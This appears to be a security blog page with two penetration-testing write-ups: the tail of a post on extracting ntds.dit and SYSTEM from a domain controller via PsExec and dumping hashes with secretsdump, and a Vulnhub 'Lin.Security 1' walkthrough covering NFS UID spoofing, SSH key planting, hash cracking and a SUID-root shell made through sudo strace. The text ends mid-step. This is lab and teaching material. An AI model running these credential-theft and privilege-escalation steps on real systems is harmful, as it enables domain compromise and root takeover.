Content of the "out.txt" file will tell us the location of the shadow copy.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCxhTY4hWMaZeVxGaD9kY8tXjXDeYGsfa-S33uNb2kFynAOeQGk_BEoLW-6iV1ahK1oeBt50wcz6c5Ym6oNQCja7oH5F0Qw52i6Vac7S4LLxScwcmpxWPHQ_6vlNFQnefFnbPRNLIHC8Y/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="854" data-original-width="1339" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCxhTY4hWMaZeVxGaD9kY8tXjXDeYGsfa-S33uNb2kFynAOeQGk_BEoLW-6iV1ahK1oeBt50wcz6c5Ym6oNQCja7oH5F0Qw52i6Vac7S4LLxScwcmpxWPHQ_6vlNFQnefFnbPRNLIHC8Y/s1600/6.png" /></a></div>
<br />
In above screenshot, we can see that shadow copy volume name is "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\".<br />
<br />
location of "ntds.dit" and "SYSTEM" file will be following:<br />
<br />
"shadow_copy_volume_name\Windows\NTDS\NTDS.dit"<br />
<br />
"shadow_copy_volume_name\Windows\System32\config\SYSTEM"<br />
<br />
In my case it will be:<br />
<br />
"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\NTDS.dit"<br />
<br />
"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SYSTEM"<br />
<br />
Let's copy the "ntds.dit" file from the target Windows AD Domain Controller machine by using below mentioned command:<br />
<textarea cols="120" rows="2">PsExec.exe \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\NTDS.dit \\192.168.56.101\C$\xampp\htdocs\box\ps\"</textarea>
<br />
<br />
This command will copy the "ntds.dit" file from remote machine having IP "192.168.56.200" to the machine "LABONE" having IP "192.168.56.101" in directory "C:\xampp\htdocs\box\ps\"<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwDGaqQAAyJdskaOKYXVu0iP7le48_oxOdtPNcHi8v9ZdLywEazKgXEWQ0_IOlKvl_lOo7HnUrhJf2guyxz4UWYHmdtTk5IdFzsTUQxgtq70PqYeWfI2V4XTorD0IyTRNttB5wV2s4UNw/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="657" data-original-width="1595" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwDGaqQAAyJdskaOKYXVu0iP7le48_oxOdtPNcHi8v9ZdLywEazKgXEWQ0_IOlKvl_lOo7HnUrhJf2guyxz4UWYHmdtTk5IdFzsTUQxgtq70PqYeWfI2V4XTorD0IyTRNttB5wV2s4UNw/s1600/7.png" /></a></div>
<br />
And yes, web shell is showing that 1 file has been copied from target DC machine to my machine. Let's confirm and check whether directory "C:\xampp\htdocs\box\ps" is having "ntds.dit" file or not.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5fwx6BmAvQYXYc7R9Gv_gdsmhcrh3msfgJvQQdRW8vYMugkVVmTtWL8GQTvJlC587JYOMOjPiDTNo8fcfJbSMbbVwpXnS03qTSr3PzLhz0ZeBFfKbI_LSvccvzpsLXr8c5bEROHc7544/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="716" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5fwx6BmAvQYXYc7R9Gv_gdsmhcrh3msfgJvQQdRW8vYMugkVVmTtWL8GQTvJlC587JYOMOjPiDTNo8fcfJbSMbbVwpXnS03qTSr3PzLhz0ZeBFfKbI_LSvccvzpsLXr8c5bEROHc7544/s1600/8.png" /></a></div>
<br />
Yes, it has been copied to "LABONE" machine on which i am having web shell access.<br />
<br />
And, finally copy "SYSTEM" file as well using below mentioned command:<br />
<textarea cols="120" rows="2">PsExec.exe \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SYSTEM \\192.168.56.101\C$\xampp\htdocs\box\ps\"</textarea><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNpF_qrqORQgfXXoa0srC92bSN5DN14rFR7OwuCyuQ9mGrolO6yQfa8WuHlLyEC57S-9W6sKmrAnPsFCKmn3PFLWuBad9My5_Tds2W2C9wn39tiBsjKWy69qUurqpu02Zv0l1jHcIx4Dk/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="723" data-original-width="1590" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNpF_qrqORQgfXXoa0srC92bSN5DN14rFR7OwuCyuQ9mGrolO6yQfa8WuHlLyEC57S-9W6sKmrAnPsFCKmn3PFLWuBad9My5_Tds2W2C9wn39tiBsjKWy69qUurqpu02Zv0l1jHcIx4Dk/s1600/9.png" /></a></div>
<br />
Command executed successfully and web shell showing "1 file copied" message. let's check for "SYSTEM" file as well.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvsLzrnwgALFi9xng08NNr9VGIYA6czChg2yJfAQaafwUMbwzgrglioFzqn3EDBhmHEuEwBVSktVwdFpAZEJJSDLVwFs15Jn8K49gc56NYKxuxj43pngmlGRQAMlU4A-SV7Tzh8RoA-4M/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="731" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvsLzrnwgALFi9xng08NNr9VGIYA6czChg2yJfAQaafwUMbwzgrglioFzqn3EDBhmHEuEwBVSktVwdFpAZEJJSDLVwFs15Jn8K49gc56NYKxuxj43pngmlGRQAMlU4A-SV7Tzh8RoA-4M/s1600/10.png" /></a></div>
<br />
And that's all. we finally got both the files on "LABONE" machine, from where we can download these files using web shell.<br />
<br />
Now, we can extract Domain, udi, rid LM and NT hashes from "ntds.dit" and "SYSTEM" files using <a href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py" target="_blank">secretsdump.py</a> python script<br />
<br />
command to dump user id, LM and NT hashes is:<br />
<textarea cols="120" rows="1"> python secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL</textarea>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUwiP7FKcgJlBNB4x9b1iEO-Hq8SHHHN5JtyUnl1y4HgiSyKBndPBPkk5f4zZGeAEUNjsnP6JSkwF7BFGKuZb1TqLX9PvYGv93XAfPZqqudCuUA0c-UyaXqdaeC3bOX9Tt4WF1UUbZ8SI/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="185" data-original-width="1127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUwiP7FKcgJlBNB4x9b1iEO-Hq8SHHHN5JtyUnl1y4HgiSyKBndPBPkk5f4zZGeAEUNjsnP6JSkwF7BFGKuZb1TqLX9PvYGv93XAfPZqqudCuUA0c-UyaXqdaeC3bOX9Tt4WF1UUbZ8SI/s1600/11.png" /></a></div>
<br />
Result will be something like this<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTTFLFNdnmH39XdX1Z-b8usIpUCKblCEkkErIb15EdY8QckweEW0gxBgxPey9Xl4VIUrDHKGfyYAonTB-KfrWSl91JDrV3X8ua8VP8r6t52huZOkceoQt8H56Op6wCHvU3HFXoMD2uLEw/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="844" data-original-width="1436" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTTFLFNdnmH39XdX1Z-b8usIpUCKblCEkkErIb15EdY8QckweEW0gxBgxPey9Xl4VIUrDHKGfyYAonTB-KfrWSl91JDrV3X8ua8VP8r6t52huZOkceoQt8H56Op6wCHvU3HFXoMD2uLEw/s1600/12.png" /></a></div>
<br />
Thanks for reading.<br />
<br />
Special thanks to <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/vysecurity" target="_blank">Vincent Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, <a href="https://twitter.com/be_vvk" target="_blank">vivek chauhan</a>, <a href="https://twitter.com/Pwsecspirit" target="_blank">Spirited wolf</a>
<br />
<br />
<br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;">--==[[ With Love from Team IndiShell ]]==--</span><br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;"> </span><br />
<div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number46 index45 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,</code></div>
<div class="line number48 index47 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals,Dinelson Amine, cyber gladiator,Cyber Ace,Golden boy INDIA,</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash, D3</code></div>
<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain"># My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, Anurag, Cyber Warrior</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
<br />
<br />
<br /></div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-37055064317292788502018-07-15T20:15:00.000+05:302019-05-18T21:24:01.633+05:30Vulnhub Linux VM "Lin.Security 1" Walkthrough<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
Hello All,<br />
<br />
This blog post is about the walk through of the vulnerable Linux VM "Lin.Security 1"<br />
download Link :- <a href="https://www.vulnhub.com/entry/linsecurity-1,244/" target="_blank">https://www.vulnhub.com/entry/linsecurity-1,244/</a><br />
<br />
After configuring the VM, I started with Port scanning using NMap scanner.<br />
Result was following<br />
<textarea cols="80" rows="32">PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7a:9b:b9:32:6f:95:77:10:c0:a0:80:35:34:b1:c0:00 (RSA)
|_ 256 24:0c:7a:82:78:18:2d:66:46:3b:1a:36:22:06:e1:a1 (ECDSA)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3 2049/udp nfs
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 38865/tcp mountd
| 100005 1,2,3 51496/udp mountd
| 100021 1,3,4 43485/tcp nlockmgr
| 100021 1,3,4 55660/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/tcp open nfs 3-4 (RPC #100003)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3 2049/udp nfs
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 38865/tcp mountd
| 100005 1,2,3 51496/udp mountd
| 100021 1,3,4 43485/tcp nlockmgr
| 100021 1,3,4 55660/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
</textarea>
<br />
<br />
Port 2049 is open and it is for NFS share service<br />
<br />
To check the available shares on the machine, ran below mentioned command which shows the NFS share<br />
<br />
<span style="color: #ff9933; font-family: "comic sans ms"; font-size: small;">showmount -e Machine_IP</span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC9vlTgwtuLYrdGgZSxMKKnkmFETZxkRZYoBj_SpKc42KiYnrUKWnE6GeOfrBk_58Lwj0eXrEaqPcBV3IINLwfPrq-PLaa7L5uRa-yAWDzqkhJBzYoqGIEbLwe-do7C07UuXE4SaW2mOo/s1600/mount+show.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="124" data-original-width="508" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC9vlTgwtuLYrdGgZSxMKKnkmFETZxkRZYoBj_SpKc42KiYnrUKWnE6GeOfrBk_58Lwj0eXrEaqPcBV3IINLwfPrq-PLaa7L5uRa-yAWDzqkhJBzYoqGIEbLwe-do7C07UuXE4SaW2mOo/s1600/mount+show.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
share "/home/peter" is available for any IP.</div>
<div class="separator" style="clear: both; text-align: left;">
Let's mount it on attacker machine using below mentioned command</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
mount -t nfs Machine_ip:share_name local_machine_directory -nolock</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I mounted NFS share on directory having name "b0x"</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioLczXydazYHtJjYxOYVMWn4VOdWRvqaUc-9JF9gG7_RDVgvY0vlMkNWnc9i15Dh04hBCQ4D9Aowv4v8WPnqe30iWe3jSEi5IPnzNpf6SIbXpMil2TOKtNQcs-3LDfANwBBUpXQwm7edM/s1600/mounted.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="350" data-original-width="860" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioLczXydazYHtJjYxOYVMWn4VOdWRvqaUc-9JF9gG7_RDVgvY0vlMkNWnc9i15Dh04hBCQ4D9Aowv4v8WPnqe30iWe3jSEi5IPnzNpf6SIbXpMil2TOKtNQcs-3LDfANwBBUpXQwm7edM/s1600/mounted.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
ls -al command shows the content of the home directory of the user peter ("/home/peter")<br />
<br />
after checking permission of the mounted share using below mentioned command<br />
<br />
<span style="color: #ff9933; font-family: "comic sans ms"; font-size: small;">stat b0x </span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgapbV1DjfuIp97ixVWArZs73JBikmDmY4kAabWnMoZs72vJ6sUkFlQtgbSG8S6RvLPSYEq-MEZgNdjfhjA2cY8Fey7XP4LxqlY5lLJjwzkokLtMx_wIltWqA0g75B7qCtEV0EmBjVALUo/s1600/permission.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="244" data-original-width="842" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgapbV1DjfuIp97ixVWArZs73JBikmDmY4kAabWnMoZs72vJ6sUkFlQtgbSG8S6RvLPSYEq-MEZgNdjfhjA2cY8Fey7XP4LxqlY5lLJjwzkokLtMx_wIltWqA0g75B7qCtEV0EmBjVALUo/s1600/permission.png" /></a></div>
<br />
<br />
After searching on internet i came to know about NFS share vulnerability according to which "to access NFS share, uid and gid need to match the ones of the shared directory on the server"<br />
Currently, NFS share permission is having UID 1001 and GID 1005.<br />
<br />
so we need to have a OS user having name "ftp" with UID "1001" and GID "1005".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGu_GK9uE6DFOzT1DCXd_b46lEJDMW_zW4756m_huklfrkvyyXOlBh-0HBOc1QzJh8ufhja5DvFB76CF7pKehbhmAMu4bSYQvo3b9a6onJEzqauLWkodex2cpmMWKNZo6VNzo3zW6rVXI/s1600/user.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="108" data-original-width="534" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGu_GK9uE6DFOzT1DCXd_b46lEJDMW_zW4756m_huklfrkvyyXOlBh-0HBOc1QzJh8ufhja5DvFB76CF7pKehbhmAMu4bSYQvo3b9a6onJEzqauLWkodex2cpmMWKNZo6VNzo3zW6rVXI/s1600/user.png" /></a></div>
<br />
after changing the UID and GID of OS user FTP, switch to is and try to create a file so that we can confirm that we are having privilege to create file directory on the mounted share.<br />
<br />
Now, i created .ssh directory and copied "id_rsa.pub" key of the user "ftp" to mounted share in directory ".ssh" with name "authorized_keys" so that i can SSH to machine from my machine using SSH key.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCUqg54qu0-N4t_AVelLNthRP0Tcu1twc0n2Dp7KfxHNiny_GSD5iLsjXs3FwsL36jVgObD3Dp6Ku3cA1nYTn0YED2WsRyJfaZ-KVO_G5hmT901WofG1cGWAAnPK5LO4p6s5DhkJVUqmA/s1600/key.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="205" data-original-width="776" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCUqg54qu0-N4t_AVelLNthRP0Tcu1twc0n2Dp7KfxHNiny_GSD5iLsjXs3FwsL36jVgObD3Dp6Ku3cA1nYTn0YED2WsRyJfaZ-KVO_G5hmT901WofG1cGWAAnPK5LO4p6s5DhkJVUqmA/s1600/key.png" /></a></div>
<br />
After pushing the SSH key file, we can login to machine by using below mentioned command:<br />
<br />
<span style="color: #ff9933; font-family: "comic sans ms"; font-size: small;">ssh peter@machine_IP</span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJOarY5npUspFGY92Ted4hyphenhyphen9hRk2psp6fDe3clcVwnTCLSZQWwwUI4UA1mvvhDg81ShfasB21fPSTPsUdp-4btxhDqJOryKjp7MT_gIgbermXq5LdBRyhTLL80dIpVvJfTqgTMEnwx2l4/s1600/nfs+share+6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="300" data-original-width="1054" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJOarY5npUspFGY92Ted4hyphenhyphen9hRk2psp6fDe3clcVwnTCLSZQWwwUI4UA1mvvhDg81ShfasB21fPSTPsUdp-4btxhDqJOryKjp7MT_gIgbermXq5LdBRyhTLL80dIpVvJfTqgTMEnwx2l4/s1600/nfs+share+6.png" /></a></div>
<br />
<br />
Now, we are inside the machine. I read the "/etc/passwd" file and got a OS user "insecurity" entry having UID 0 and having unix hash in "Shadow masking" field<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5eTzICyYKCofbIta1oSEC2APmeDzVzyY9AhY-b6Y6LQZW4LOSucWoOEvoZW0i_SaGCme61V5Mo8_XyRjLsfjdaNGOOGLT5E1Q0V2nf4HiB-PPRHvZfYzfy0Ap_24RQ2NC3oGIWeSypAk/s1600/uid+0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="363" data-original-width="1038" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5eTzICyYKCofbIta1oSEC2APmeDzVzyY9AhY-b6Y6LQZW4LOSucWoOEvoZW0i_SaGCme61V5Mo8_XyRjLsfjdaNGOOGLT5E1Q0V2nf4HiB-PPRHvZfYzfy0Ap_24RQ2NC3oGIWeSypAk/s1600/uid+0.png" /></a></div>
<br />
I searched about it and found that, in old systems, "/etc/passwd" file used to have password hash of the OS user. So I cracked the hash using Hashcat and got the plain text password of the hash<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNjDYoQFGS4SqZznavHErrKXZNX1Zj0fWrX13hynppldrmiKfoP5ww2VGRb3R2Ormu1XX7hPgzuA39xyxlUHxtMYIbRlq_PR3zrLdbbBczqNTAbcRcBZ7RYsmSuEDutvC4-LbXFfmssmw/s1600/hash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="467" data-original-width="1318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNjDYoQFGS4SqZznavHErrKXZNX1Zj0fWrX13hynppldrmiKfoP5ww2VGRb3R2Ormu1XX7hPgzuA39xyxlUHxtMYIbRlq_PR3zrLdbbBczqNTAbcRcBZ7RYsmSuEDutvC4-LbXFfmssmw/s1600/hash.png" /></a></div>
<br />
Now, i logged in as user "insecurity" using the recovered password and got root user privilege on the machine using one method.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm7Jnkfdov7IpbYYBCnWX7H6ops0lW3KTmYJx3BTj2NNCNd05kaC-K1vWjdAy2OCEiaYef2l7Py2JEhMkif6UFOr_c5PVgdX2nEM9uwrMcYst1SMcEcLuOxmpidN69rU_L4hgPGtDRjhY/s1600/root.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="510" data-original-width="1194" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm7Jnkfdov7IpbYYBCnWX7H6ops0lW3KTmYJx3BTj2NNCNd05kaC-K1vWjdAy2OCEiaYef2l7Py2JEhMkif6UFOr_c5PVgdX2nEM9uwrMcYst1SMcEcLuOxmpidN69rU_L4hgPGtDRjhY/s1600/root.png" /></a></div>
<br />
As machine designer mentioned, there are multiple ways to root this machine, so i checked another possibilities as well and figured out that user "peter" is capable of running "strace" binary with sudo privilege. i used below mentioned command to check if user "peter" is having sudo privilege on executing any binary<br />
<span style="color: #ff9933; font-family: "comic sans ms"; font-size: small;">sudo -l </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5rGDBRJfH_EYkyvcp7aDoQYY_-TAas0o5ulJi9xcZfcbGGL4WmUuM4GXsqZB7O4K35LtXTkM_5WXTHl6vo19Flw4nAw7Omqzaue4TIuZr5oXmUZK8SZ4ltqDZ6412X-4bg6qrU3iaOh4/s1600/sudo+ouput.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="262" data-original-width="1224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5rGDBRJfH_EYkyvcp7aDoQYY_-TAas0o5ulJi9xcZfcbGGL4WmUuM4GXsqZB7O4K35LtXTkM_5WXTHl6vo19Flw4nAw7Omqzaue4TIuZr5oXmUZK8SZ4ltqDZ6412X-4bg6qrU3iaOh4/s1600/sudo+ouput.png" /></a></div>
<br />
Now, to take advantage of executing "strace" with sudo, I planned to compile a C program which drop user to "/bin/sh" shell, using sudo strace changing ownership to root user and making it SUID binary.<br />
<br />
Code of C program which i used<br />
<textarea cols="40" rows="12">#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
setuid( 0 );
system( "/bin/sh" );
return 0;
}
</textarea>
<br />
<br />
compiled program using below mentioned command<br />
<br />
<span style="color: #ff9933; font-family: "comic sans ms"; font-size: small;">gcc r.c -o r</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_V17w3gP_K9tTjth6V3Xel4sfeUrkOna2mMfSvZlPy5jDfYkgI764WLVyNC01N1okFf6i-AS0qZ_qFAmenc2XtyNgnIERjGFtBLltS8_haMB0k19Ir7FnZPdbKkqAB85cIAy0MlKnHas/s1600/compiling.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="543" data-original-width="847" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_V17w3gP_K9tTjth6V3Xel4sfeUrkOna2mMfSvZlPy5jDfYkgI764WLVyNC01N1okFf6i-AS0qZ_qFAmenc2XtyNgnIERjGFtBLltS8_haMB0k19Ir7FnZPdbKkqAB85cIAy0MlKnHas/s1600/compiling.png" /></a></div>
<br />
<br />
After compiling the code, ran below mentioned command to change the ownership of the compiled C code file<br />
<br />
<span style="color: #ff9933; font-family: "comic sans ms"; font-size: small;">sudo /usr/bin/strace chown root:root r</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnKeHNPXUEr-2jN4UoB0gepFlNQFSyqAEW7c8-p0uTc9tpsAFPgrH9oNq-1j4Ea0VcCU88PMFGCytYFODXn9K4juhxpb_e5bBzfhZCYg2ObrEk_eSBEAfMIO_qBvvQTX2u36EdNIoOXqo/s1600/before+chown.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="550" data-original-width="960" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnKeHNPXUEr-2jN4UoB0gepFlNQFSyqAEW7c8-p0uTc9tpsAFPgrH9oNq-1j4Ea0VcCU88PMFGCytYFODXn9K4juhxpb_e5bBzfhZCYg2ObrEk_eSBEAfMIO_qBvvQTX2u36EdNIoOXqo/s1600/before+chown.png" /></a></div>
<br />
Check if command executed successfully or not<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd-WT2c4iO2EhYuFjSrLh9t54ZuAvNnC-L3EMVLNM7uBqCfdjkS6BAHTsLBEREnvLp5TIZ3e6qZxSIDFTifmBBqk5GJVz6KLXA7Tv0CQVQtZ0k0CT8pMHz7KzqtA1uOjBhtsO5mgxImqI/s1600/after+chown.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="609" data-original-width="958" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd-WT2c4iO2EhYuFjSrLh9t54ZuAvNnC-L3EMVLNM7uBqCfdjkS6BAHTsLBEREnvLp5TIZ3e6qZxSIDFTifmBBqk5GJVz6KLXA7Tv0CQVQtZ0k0CT8pMHz7KzqtA1uOjBhtsO5mgxImqI/s1600/after+chown.png" /></a></div>
<br />
It worked and now binary is having owner "root".<br />
To set SUID bit on file, ran below mentioned command using "strace" with sudo<br />
<br />
<span style="color: #ff9933; font-family: "comic sans ms"; font-size: small;">sudo /usr/bin/strace chmod u+s r</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
